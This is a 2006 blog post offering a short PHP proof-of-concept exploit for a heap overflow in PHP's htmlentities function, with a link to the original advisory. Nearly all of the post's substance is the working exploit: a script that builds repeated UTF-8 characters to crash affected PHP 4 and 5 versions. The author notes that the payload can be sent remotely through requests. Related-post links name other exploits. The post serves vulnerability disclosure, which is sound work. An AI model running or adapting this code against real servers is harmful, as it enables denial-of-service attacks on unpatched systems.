PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS?
07.11.2006
Okuyucu : 7.456
Günlük Okuyucu : 13,4
Okuyucu : 7.456
Günlük Okuyucu : 13,4
I like Proof of Concepts, so this is a simple PoC for PHP HTML Entity Encoder Heap Overflow Vulnerability. You can supply payload from requets so it's remote.
Original Advisory : http://www.securityfocus.com/archive/1/450431
<?
// PHP 5 <= 5.1.6, PHP 4 <= 4.4.4
$fuzzFixed="";
echo "something... we need this stupid echo or do something else...";
for($pl=0; $pl<64; $pl++)
$fuzzFixed .= code2utf(977);
htmlentities($fuzzFixed , ENT_NOQUOTES, "utf-8" );
function code2utf($num){
return chr(($num>>6)+192).chr(($num&63)+128);
}
echo "ehm...";
?>

Yorumlar
Yorum Ekle
PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS? ile İlişkili Olabilecek Yazılar - Haberler
SSL Implementation Security FAQRgod
SQL Tunnelling - Exploiting Internal Networks via SQL Injection
MS08-006 Exploit
Flawed CSRF Protections
Diğer Yazılar
Pocket için CHM Reader .NET
Pocket PC / PDA için PGP
Pocket PC Geyikleri
Pocket PC için Adobe Acrobat Reader 2.0
Pocket PC için Mp3
Pocket PC' ye Not Almak -de Okumak
Politics is the new art
Polyphasic Uyku, Nasıl günde 5 saat daha az uyurum?
Popüler Disassembler ve Debuggerların ana sorunu
Popülerliği keşfetmek
Post Build Event
Powershell
Pragmatic Programmer Notları
Pratik bir Queue kullanımı örneği
PrintMe Internet Printing
Priority of Paybacks
Privoxy, Microsofft Anti Spyware ve Tune Up Utilities
Prj+13 Designersvault
Problemleri Çözme üzerine diğer bir harika söylem
Neredeyim ?
Ferruh.Mavituna » English (Beta) » PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS?